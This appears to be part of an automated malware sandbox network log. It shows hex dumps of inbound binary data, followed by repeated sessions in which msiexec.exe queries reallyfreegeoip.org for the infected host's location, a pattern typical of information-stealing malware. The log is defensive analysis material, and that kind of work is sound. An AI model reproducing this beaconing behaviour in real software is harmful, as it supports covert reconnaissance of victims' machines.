2024-10-21 09:04:07 UTC	1327	IN	Data Raw: 23 74 a3 65 34 47 88 07 ad 95 9f cf 31 11 97 6a 87 74 15 64 5e 08 f3 0d 5e a1 2b 34 b3 6d b3 ad 9e 46 63 17 21 a5 87 6c 6d e8 13 55 28 fa 98 5e 6f 9b cd 5e 7e ba a7 67 7b 8e 0e 2b 73 1c 60 7c dc cc fa ef 73 7e 55 24 41 c3 af ab fb d8 2a 51 a2 8f 01 91 68 22 0d bb b8 33 3f 2a 6b 09 e1 4d 7b 5a 66 db 0d 64 19 3d 5d e1 55 78 0b 99 3d c5 9e 2b e3 96 0a 9c 00 65 5b f3 71 1c e2 dd 14 29 4b b8 ca 24 a0 a0 62 58 96 55 a8 59 a5 c0 ac 6f 04 4d 4f 90 05 2d d9 80 44 b0 98 b2 b8 4d 17 f3 16 0a d5 2a 96 c4 d7 aa 1b 2d 39 43 9e f5 87 9e d3 f0 01 1c 52 85 f3 33 92 a5 46 e7 7a b0 15 28 e7 52 90 4d 73 e8 ac 5a 9c b8 ec 1d b6 4b 04 e1 19 4b c8 9f cf 38 21 49 46 82 d8 4f ae 53 a9 cf ea be 9e 03 a1 bc dc e4 fd c0 96 80 14 57 22 a6 a9 93 f7 17 14 00 95 6b 94 ec 00 18 75 ce b6 Data Ascii: #te4G1jtd^^+4mFc!lmU(^o^~g{+s`\|s~U$AQh"3?kM{Zfd=]Ux=+e[q)K$bXUYoMO-DM*-9CR3Fz(RMsZKK8!IFOSW"ku
2024-10-21 09:04:07 UTC	1378	IN	Data Raw: 94 2d 0e 4b 97 c8 1e 56 9d 15 bf f3 c1 fa 01 b9 2f c5 23 c2 f7 26 3b db 23 7c b6 3a 40 12 7e 5c 1b 7d 6d 34 20 de 88 f0 b4 e0 79 28 33 82 c1 46 3c d3 61 b3 d2 a6 bb 65 76 0e 58 01 47 2c 58 ea e7 fd 74 c0 c3 16 77 33 63 d5 e4 63 26 a9 b8 b0 1a 1b 28 84 bd c5 23 ea e4 f5 e0 2d b2 72 5d 31 cc 05 30 e7 64 6a 75 fd ed 48 97 8e 99 83 ae 30 db 9b c9 f7 d5 12 4f b4 f1 23 ae 4a 72 24 8a 57 b8 5a ce cf 19 fc 4b 46 0f f3 d3 f1 8f 02 b2 db fd 8c 4b 66 2d 21 6b 11 38 eb 3e 83 57 a5 e9 af 04 df 47 dd 27 0a 47 c9 a6 ab 4c 21 57 5e 96 67 8c 8c 3d 56 89 dd 74 9c 7e f0 48 af f2 d9 e3 c3 d9 46 78 d1 de 20 98 7d a6 d4 46 34 e7 ce 8e 74 f9 e7 fb 99 a9 ec 46 10 a1 08 fe 4d d1 c2 04 a7 f6 6c 94 7b 98 11 94 2e bd 35 d9 5c 6d 95 9a 6d a7 34 88 ac d2 e2 9e 01 09 ba c1 75 60 91 9e Data Ascii: -KV/#&;#\|:@~\}m4 y(3F<aevXG,Xtw3cc&(#-r]10djuH0O#Jr$WZKFKf-!k8>WG'GL!W^g=Vt~HFx }F4tFMl{.5\mm4u`
2024-10-21 09:04:07 UTC	1378	IN	Data Raw: 40 76 0d 9a 1c 7e df 58 95 7d ad 08 cf fd 65 81 3f 56 56 c5 5f b0 89 f3 39 f4 1d 1b a8 12 d6 d9 ca 20 14 b1 27 0b 06 32 f3 7d 8d a5 39 e2 ea 1a 6e bb 50 71 85 82 c8 12 4e 72 2b 52 86 e6 0c 65 0a ca f7 f0 74 70 f9 4c ec 3a 3f 38 bd f8 ee a9 e9 64 c5 44 1a 86 4f e0 a7 7f a2 4c b5 d9 25 eb ed 70 03 35 db f4 c4 87 69 cf af 57 a0 4c d9 e1 6b 80 0c a5 67 6b 0f 4d db 4c 98 63 c3 e5 b4 8e 09 a4 66 61 3a 5f e2 4a 6e 5f 99 91 05 06 c1 2e 36 a9 79 cb 40 3d d6 73 5c 41 2b 8a 5f 80 0a d0 aa 47 7d a7 5a 3f 41 26 72 44 d1 57 f1 08 e8 50 3b c7 8a 76 c1 12 8c 5a 0b b5 58 a2 8f b2 9a fc 33 3e d4 a8 75 c5 6c ef bf 32 53 20 60 80 93 f1 39 39 54 3b 54 a9 d5 cb c7 ac d1 aa 41 db 8d 08 28 b4 f6 18 af 7b 81 8b bb b9 be 28 2e 2a 9b bd 07 a3 24 c6 dc 85 d5 7c e6 59 a1 3f 37 c4 f7 Data Ascii: @v~X}e?VV_9 '2}9nPqNr+RetpL:?8dDOL%p5iWLkgkMLcfa:_Jn_.6y@=s\A+_G}Z?A&rDWP;vZX3>ul2S `99T;TA({(.*$\|Y?7
2024-10-21 09:04:07 UTC	1378	IN	Data Raw: 5b 3d ce 78 77 a8 22 11 b1 98 87 b8 4d 17 47 cd 11 ad 42 a0 66 a0 08 3e 4a 74 7b 9e f1 f1 6b f4 ea 03 98 75 04 83 91 bd a8 c6 cc 71 b7 28 ae c3 4e e2 f9 ac bd dc f8 b5 e5 c1 1d bc 2e be d3 09 41 b8 f6 7e 3b 21 4d 34 6e ce 31 e0 40 a0 b5 f3 ba 9e 07 d5 84 67 e4 8d dc cc 09 01 57 58 98 0c 92 e4 17 7b 41 b9 67 81 cd 5d 77 bf c4 c8 f7 86 e8 c6 f3 f6 2c aa 32 9d 57 1c 74 5a 61 a1 16 a7 11 11 79 92 b6 38 82 08 a9 95 90 5f 51 e3 e1 d5 d4 bb 9e 18 14 2c dc 8c 6b d0 38 64 04 5d 5c b6 a3 de 38 1b e1 92 0c de 35 8c df 9b 96 07 29 2f a8 ea 84 f6 a0 fc de 49 c0 0b 28 c2 22 dd 64 30 b8 20 c9 77 1d 0a 6a 4c eb 05 b1 bb e5 ef cf 63 83 6b 42 56 e1 92 22 35 35 26 c6 b5 21 c4 c3 04 6d c5 40 b0 56 cd 89 cc 04 f5 b5 68 85 86 83 0a c9 0a 3e 95 50 28 c5 f4 de 81 20 b1 ae 39 74 Data Ascii: [=xw"MGBf>Jt{kuq(N.A~;!M4n1@gWX{Ag]w,2WtZay8_Q,k8d]\85)/I("d0 wjLckBV"55&!m@Vh>P( 9t
2024-10-21 09:04:07 UTC	1378	IN	Data Raw: 42 7c f7 06 a7 f1 5a 55 ae d0 92 6b f0 c2 ec bb 1d fd 5c 75 a9 2d e6 35 bf dc 1f b8 8f 49 8d 0f a0 11 ac e9 1f 10 c3 2e ff 8c b2 6b 05 11 99 d2 d8 e2 92 05 ab b7 aa 07 c0 94 9e 9f 95 14 d3 93 c8 71 24 8d 83 8a 28 d4 82 ef 51 b4 2a 87 69 ff 73 a2 f5 36 15 e0 d2 91 4d c9 55 7b 8d f0 a5 6b 9e 4c dd bb 9c 71 9e 7c bd 18 de af ee 1d 53 4c 3f 55 ed a1 f5 8d b8 86 3c c6 03 b2 83 42 fd 7d a1 7c 95 83 2b 9a 7d 84 4a 67 74 6c fb dc 50 57 47 61 13 7f ee 01 3c f7 85 7f 16 ba 93 ff df 3c c9 8c b6 60 be 61 f7 9a ce 56 65 e2 4d 51 00 e7 f0 5d fb fc bc 57 81 6e 44 dd 72 b6 91 9a b4 20 fb cf 71 d8 bd 97 74 2c 8f 5f dd 55 ae c2 b2 8b 64 1f d4 7b 84 d3 5c 71 9d b4 5c 88 92 1c 2c fc a6 eb 4a 22 d2 9a f8 07 a5 cf 04 6a c1 81 fd 72 c2 f5 3b 87 e2 85 69 0c 73 31 cf 78 ec 80 18 Data Ascii: B\|ZUk\u-5I.kq$(Q*is6MU{kLq\|SL?U<B}\|+}JgtlPWGa<<`aVeMQ]WnDr qt,_Ud{\q\,J"jr;is1x
2024-10-21 09:04:07 UTC	1378	IN	Data Raw: 76 c2 6f 58 1d 5c 0d 20 1e a1 93 f8 52 bb bf 3b 5e a3 18 cb b9 93 fd ad 4c c6 9e 19 28 ce e0 ec f0 68 a4 a9 99 47 bf 31 30 3f 96 ac bc a3 24 cc 17 ce a5 7c e6 53 a1 1f 49 fa f7 37 76 7a f1 4c 0d 35 2b 58 bc 44 2c da c9 19 2e 52 c5 bd a1 0e 47 4e 5e fc fc a7 68 7b f5 14 7b 6d a5 5a 76 ce 4c 7b 76 8e 32 f0 e7 6d 3d 75 0d 79 33 86 9a b0 dd b3 66 f6 f1 34 b5 e8 9b 1d ef 02 b5 8b 23 d8 d2 2d 02 03 76 19 be d9 9c 85 fd fe b2 99 eb dd 24 e8 64 7a 76 ec 92 42 25 78 79 b5 cb e9 dc e8 67 26 1e 4f 62 eb e5 7a 68 fe 11 9b a9 82 82 34 ee 07 80 31 7e 74 5b 51 c8 4e ef ab f1 cb 50 42 98 77 55 ed 83 0d 8b 53 3c 57 68 f6 3b 80 15 7b 14 a3 a3 21 21 19 05 55 8a b9 f4 41 62 df fb 2c bf 81 e2 7b 40 62 99 1c 88 d9 c3 97 e9 18 07 9c 48 e0 9c cd 6f ae e9 51 f2 f7 a7 42 b1 72 d5 Data Ascii: voX\ R;^L(hG10?$\|SI7vzL5+XD,.RGN^h{{mZvL{v2m=uy3f4#-v$dzvB%xyg&Obzh41~t[QNPBwUS<Wh;{!!UAb,{@bHoQBr
2024-10-21 09:04:07 UTC	1378	IN	Data Raw: 2e 12 68 80 c1 12 e9 ad c0 f6 bb f9 a6 73 34 9a cb 88 20 05 1f 3f c8 2f 04 df b9 ba 48 df 36 e4 bb cd f9 64 83 cb d7 3a ad 92 87 d8 4e 3e 39 bd 46 22 da 0a f6 f4 2a bc ac 5f a6 e3 d0 59 e2 0a 30 4e 26 2b f3 5f 6a af 4e e0 45 b4 4d 70 b8 1e 80 68 f3 d4 64 69 b4 d0 c1 b8 6c ea 07 c8 ce 2b 2e 16 56 f2 6f 58 01 3c 7b c4 4e 96 48 4e 55 5f ac c2 ec 93 b4 98 21 2c 52 b3 6c 0c f3 46 b2 33 19 83 62 bf 9d d1 a3 d9 bd 00 14 73 d6 00 01 d6 23 06 58 b5 b4 bb 23 c9 fe 2c d3 f9 15 0c 98 d3 77 1f 53 f8 11 38 78 e6 d6 e2 37 ce b8 6d c3 30 d8 c2 f1 01 19 c9 3b a4 97 0b fb ce 46 84 fd db 71 30 bb 06 1a 5b b7 e3 f2 a3 ec 58 0e e1 15 73 09 f4 c4 a9 57 ac 75 1e ec 10 70 b9 1f 9c ba 24 c5 6e 93 ac 88 e1 79 a1 f8 09 16 df 30 74 6d c3 bb 57 9d ab c8 7c 7a 4e 74 30 0d fa 8b 4d 6f Data Ascii: .hs4 ?/H6d:N>9F"*_Y0N&+_jNEMphdil+.VoX<{NHNU_!,RlF3bs#X#,wS8x7m0;Fq0[XsWup$ny0tmW\|zNt0Mo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	62511	188.114.97.3	443	7808	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:04:10 UTC	87	OUT	GET /xml/155.94.241.186 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-21 09:04:10 UTC	892	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:04:10 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 27115 Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ylCrTychrdADC2lRfv4QTNbZcUWi98v925KMrt2ni7xOQwF9utzpVGmPBdAY9KGYTcrOQMBvS%2FqOt2y6AMqjz2V7n10Xj6vTsQbNBzzSI7PL5DvbWkuUJbBZEx1S%2F7cy5epWUhNb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d60141f086d467e-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1041&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2535901&cwnd=251&unsent_bytes=0&cid=13c55627ebf736e6&ts=158&x=0"
2024-10-21 09:04:10 UTC	365	IN	Data Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
2024-10-21 09:04:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	62512	188.114.97.3	443	7808	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:04:10 UTC	63	OUT	GET /xml/155.94.241.186 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-21 09:04:11 UTC	896	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:04:11 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 27115 Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qA7%2BH8Fqsguwnjz8a9KaG7xGm57g8w46XG9d4JEHZJkoZsy3JDGjbkhB13NUnwMp3iLhBMXppC2j2kBV9ggDZcTp1xiK0YnkIAMIRit5u6SSxm3%2FLQF%2B44QwUN%2BdV50Wbwj1tqxG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d601424a81ce79e-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1341&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2217457&cwnd=232&unsent_bytes=0&cid=efb1176bbc836dc2&ts=145&x=0"
2024-10-21 09:04:11 UTC	365	IN	Data Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
2024-10-21 09:04:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	62514	188.114.97.3	443	7808	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:04:12 UTC	87	OUT	GET /xml/155.94.241.186 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-21 09:04:12 UTC	895	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:04:12 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 27117 Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fHKdn3qO5uX%2FX%2Fk5XQKpLe0lh%2BIBni2K9PNvVniV1i8qPOSyoQsgyYmEsOsbhlG0pKsgmetNmwnSc1Fx3e5XPeUoZRJpYy7Z9Imgg54g%2FfC1hQ3cg4T5lOekobdAz66JpBYhOByj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d60142d8973e736-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1836&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1563714&cwnd=32&unsent_bytes=0&cid=09d9890fd07d810c&ts=148&x=0"
2024-10-21 09:04:12 UTC	365	IN	Data Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
2024-10-21 09:04:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	62516	188.114.97.3	443	7808	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:04:13 UTC	63	OUT	GET /xml/155.94.241.186 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-21 09:04:13 UTC	890	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:04:13 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 27118 Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bWhV0lmZsljuzaasilpotzLBR2yKgqkPemh3MGtAExA0XNhBJ7gI0YlyjED23qtpC5OJp9kYvt5PfQUE9QpobErCkaHABMjcfrGR5MVZvLIssB%2BLqG71XuqN2S9PFJKh5McBVrOh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d60143658eb4602-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1114&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2649588&cwnd=251&unsent_bytes=0&cid=e8de03e6da502a24&ts=151&x=0"
2024-10-21 09:04:13 UTC	365	IN	Data Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
2024-10-21 09:04:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	62518	188.114.97.3	443	7808	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:04:15 UTC	87	OUT	GET /xml/155.94.241.186 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-21 09:04:15 UTC	896	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:04:15 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 27120 Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sSYdp750QUmpMED2Z4oY%2FjJyqDuV3EyIOs1r%2FIw84q9d7HknrG%2FEThtds0eUVcv8nLE0hcyzgFgAk1hZ6invN8AsbK0xesx8%2B0JM9DEEHzl06aVoME17MjQgT1MwFcGePcD4Qhar"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d60143f4f64468f-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1797&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1587719&cwnd=244&unsent_bytes=0&cid=6ea54c3f5ccdf6a7&ts=148&x=0"
2024-10-21 09:04:15 UTC	365	IN	Data Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
2024-10-21 09:04:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	62520	188.114.97.3	443	7808	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:04:16 UTC	87	OUT	GET /xml/155.94.241.186 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-21 09:04:16 UTC	898	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:04:16 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 27121 Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bUu224%2BtA8z0hmCpwxZPw8RcVLS%2FJjQBKwRy5Xl3havxiOx20xCkR6xK8kn0qFKm8K9eurM7ipm7TFPjNrJlF%2BtUhB2yOIePjSEoR6AMbpt46MOBt6%2Fuai33j7zRdI8cfLga%2Fjg7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d60144838026b83-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1118&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2458404&cwnd=242&unsent_bytes=0&cid=d3b3da738e2bc6e7&ts=159&x=0"
2024-10-21 09:04:16 UTC	365	IN	Data Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
2024-10-21 09:04:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	62522	188.114.97.3	443	7808	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:04:18 UTC	87	OUT	GET /xml/155.94.241.186 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
